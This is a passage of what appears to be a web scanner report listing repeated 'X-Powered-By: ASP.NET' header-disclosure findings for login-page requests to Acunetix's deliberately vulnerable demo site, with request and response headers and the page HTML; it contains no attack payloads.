align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
